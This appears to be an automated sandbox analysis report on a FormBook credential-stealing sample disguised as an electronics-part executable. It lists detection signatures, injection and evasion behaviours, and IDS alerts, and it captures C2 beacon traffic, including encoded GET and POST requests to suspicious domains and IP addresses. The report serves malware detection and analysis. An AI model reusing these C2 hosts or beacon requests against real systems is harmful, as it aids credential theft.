Windows Analysis Report
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Overview

General Information

Sample name:	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Analysis ID:	1592544
MD5:	6e482564396bb10f5afb4244e505c3e6
SHA1:	9564141dbcedfa4bfc2df6f789db0ab8bbffad99
SHA256:	8fe18e6c77d0b63ad58b669472c8247a8771c82ce4edc65814bb4c53fe5ab51c
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	ReversingLabs: Detection: 42%
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Virustotal: Detection: 45%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: bitsadmin.pdb source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cvSKtqilyhlQ.exe, 00000006.00000000.2197594264.000000000027E000.00000002.00000001.01000000.0000000C.sdmp, cvSKtqilyhlQ.exe, 00000008.00000002.3523961232.000000000027E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.000000000317E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2278357152.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2276438628.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000002.3525550334.000000000317E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2278357152.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2276438628.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\bitsadmin.exe

Code function: 7_2_006BC390 FindFirstFileW,FindNextFileW,FindClose,

7_2_006BC390

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 4x nop then xor eax, eax		7_2_006A9E90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_00DE04F8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49976 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49939 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 149.104.185.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 172.67.147.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 149.104.185.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 149.104.185.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 172.67.147.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 209.74.64.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49956 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 209.74.64.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 172.67.147.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 209.74.64.189:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.lugao.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 160.25.166.123 160.25.166.123
Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vngz/?BXc8V=BywAvqZrlXCPypxowigGU/RMQqJ+aFEu4r9fzmpnpak2vS64kVBA8ZUuc20d6AYdHHbV7T9IEXhUPkXJmH12l+9kSAAe2W5CHPw/a2fo9vOL4zfBkwpEEo8=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.littlecarseats.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /e4zw/?BXc8V=vBV+S5Q8h7Cl09PJqQteIVoPn0WMDxyCQPiiXTQrjiV2j0wk8nAmuATUOuyLShoOecv/N06oacatEhkR7UdQnNX8vYYfl5KO9EIWGMCepu/511PNPsKoGB8=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /izrj/?f898=D4YHodiH3rXTfZ&BXc8V=j50sR9qwIfHSiYtxTFFp7g89UJFry+rQTe0kZ9YXVPGo3xxAz/jXuWZxuk+F1xvQPOoZdxLEIBdogShtQlOGjR8qYGUmJGoMkDNaZ33tU1jJrtqR7YIPhnQ= HTTP/1.1Host: www.oequ8s1l.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /qixh/?BXc8V=1RMEcCmOa+NBnL2H42a1any5QtiTZ5BG62LeNlaTxkSavmi+Sr/0k147vVBI8c7b7ZvrdBlJEtVahWNDtgmsFIs/6lOYP2MHU69GVvy+6ALSisvzm9a+ML0=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.lugao.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /s76m/?BXc8V=5+vWPd9X0wSWPJRdjPK4htAFucAo2VruY7NWHsZJjc93W8tV5J/CvgfDxHaReh/JOtz7+f35BLAy5HXA0CqVvOWOdVDklARjVuGkQkqqALzufSU8AevfCiY=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.activeusers.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /tt36/?BXc8V=7XRN4ZBNuxsgsz85WwF8d5RVD19EzJb4JnIab8u1JoWwH5zq0g0l+ZcBEWO33waNPxeiCBvzmGaSpdMTI8OJtChGzZiriz+EVcp1nviLXn5OzCwSP0UMhIk=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.rtp189z.latAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /6qnn/?BXc8V=jZjCtW5Z35UjZn8TZsrAhfuPzAvLvIn1UqsIYqvINL5GRqKd5l5cN7nY2f+SbBmC2WETDruk6ZGN6IqYT24Zv1a8PLIHAmXFEvfhPzClF16HpP7M54iZiSM=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.boldjourn.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1

Source: global traffic	DNS traffic detected: DNS query: www.littlecarseats.shop
Source: global traffic	DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic	DNS traffic detected: DNS query: www.oequ8s1l.vip
Source: global traffic	DNS traffic detected: DNS query: www.lugao.xyz
Source: global traffic	DNS traffic detected: DNS query: www.juiceem.shop
Source: global traffic	DNS traffic detected: DNS query: www.activeusers.tech
Source: global traffic	DNS traffic detected: DNS query: www.rtp189z.lat
Source: global traffic	DNS traffic detected: DNS query: www.boldjourn.website
Source: global traffic	DNS traffic detected: DNS query: www.rpa.asia

Source: unknown

HTTP traffic detected: POST /e4zw/ HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: no-cacheConnection: closeOrigin: http://www.givvjn.infoReferer: http://www.givvjn.info/e4zw/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1Data Raw: 42 58 63 38 56 3d 69 44 39 65 52 4a 70 54 68 35 43 4f 33 74 54 57 38 44 74 58 54 6c 6f 4d 71 45 47 38 61 41 6d 6a 55 2b 65 68 4b 69 30 68 2b 53 49 56 30 48 49 6f 6f 32 6b 4b 68 48 2b 50 4b 2f 43 39 43 53 6f 6e 66 70 32 69 46 6b 71 6f 5a 66 58 6e 4f 56 34 45 31 30 52 75 36 37 58 2f 6f 4b 45 77 68 34 71 6d 36 52 59 43 47 76 7a 63 70 4a 6a 2b 72 68 54 6b 62 2f 53 71 46 67 43 55 4f 52 2f 37 43 2b 48 36 73 46 37 71 48 5a 58 77 6c 65 69 4f 2b 6a 68 41 4c 45 76 6a 37 56 70 74 5a 2f 49 56 30 58 73 4a 58 67 45 65 58 41 79 33 52 42 6f 53 34 67 77 65 6c 6d 79 61 48 4f 6c 63 7a 42 56 56 6d 47 45 31 6c 67 3d 3d Data Ascii: BXc8V=iD9eRJpTh5CO3tTW8DtXTloMqEG8aAmjU+ehKi0h+SIV0HIoo2kKhH+PK/C9CSonfp2iFkqoZfXnOV4E10Ru67X/oKEwh4qm6RYCGvzcpJj+rhTkb/SqFgCUOR/7C+H6sF7qHZXwleiO+jhALEvj7VptZ/IV0XsJXgEeXAy3RBoS4gwelmyaHOlczBVVmGE1lg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 08:23:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4MbgDQZo0FIce232XVSZKN9ZiyI6K4%2BxE9pi7SVT7LknH9vcrR2WYrCmwtGNl4oDkW%2BURt%2B5Z7hxbI8DjH3Ih%2FLoqOwjo9WwHlLKHwmdBTGHI6fZOhXtY6FyUT8gBkw81JkroKYCP1AkGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb48298863b41-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=7098&rtt_var=3549&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 74 74 6c 65 63 61 72 73 65 61 74 73 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 110<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache Server at www.littlecarseats.shop Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:24:02 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:24:05 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:16 GMTContent-Type: text/htmlContent-Length: 7932Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ETag: "6785cace-1efc"Server: nginxData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 45 57 20 57 41 46 43 44 4e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 43 68 72 6f 6d 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 63 73 73 20 72 65 73 65 74 20 73 74 61 72 74 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 64 69 76 2c 20 73 70 61 6e 2c 20 61 70 70 6c 65 74 2c 20 6f 62 6a 65 63 74 2c 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 2c 20 70 2c 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 20 70 72 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 2c 20 61 62 62 72 2c 20 61 63 72 6f 6e 79 6d 2c 20 61 64 64 72 65 73 73 2c 20 62 69 67 2c 20 63 69 74 65 2c 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 65 6c 2c 20 64 66 6e 2c 20 65 6d 2c 20 69 6d 67 2c 20 69 6e 73 2c 20 6b 62 64 2c 20 71 2c 20 73 2c 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 6d 61 6c 6c 2c 20 73 74 72 69 6b 65 2c 20 73 74 72 6f 6e 67 2c 20 73 75 62 2c 20 73 75 70 2c 20 74 74 2c 20 76 61 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 2c 20 75 2c 20 69 2c 20 63 65 6e 74 65 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6c 2c 20 64 74 2c 20 64 64 2c 20 6f 6c 2c 20 75 6c 2c 20 6c 69 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 2c 20 66 6f 72 6d 2c 20 6c 61 62 65 6c 2c 20 6c 65 67 65 6e 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 62 6c 65 2c 20 63 61 70 74 69 6f 6e 2c 20 74 62 6f 64 79 2c 20 74 66 6f 6f 74 2c 20 74 68 65 61 64 2c 20 74 72 2c 20 74 68 2c 20 74 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 63 61 6e 76 61 73 2c 20 64 65 74 61 69 6c 73 2c 20 65 6d 62 65 64 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 67 75 72 65 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 6f 75 74 70 75 74 2c 20 72 75 62 79 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:18 GMTContent-Type: text/htmlContent-Length: 7932Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ETag: "6785cace-1efc"Server: nginx
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:21 GMTContent-Type: text/htmlContent-Length: 7932Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ETag: "6785cace-1efc"Server: nginx
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:23 GMTContent-Type: text/htmlContent-Length: 7932Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ETag: "6785cace-1efc"Server: nginxData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 45 57 20 57 41 46 43 44 4e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 43 68 72 6f 6d 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 63 73 73 20 72 65 73 65 74 20 73 74 61 72 74 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 64 69 76 2c 20 73 70 61 6e 2c 20 61 70 70 6c 65 74 2c 20 6f 62 6a 65 63 74 2c 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 2c 20 70 2c 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 20 70 72 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 2c 20 61 62 62 72 2c 20 61 63 72 6f 6e 79 6d 2c 20 61 64 64 72 65 73 73 2c 20 62 69 67 2c 20 63 69 74 65 2c 20 63 6f 64 65 2c 0a 20 20 20 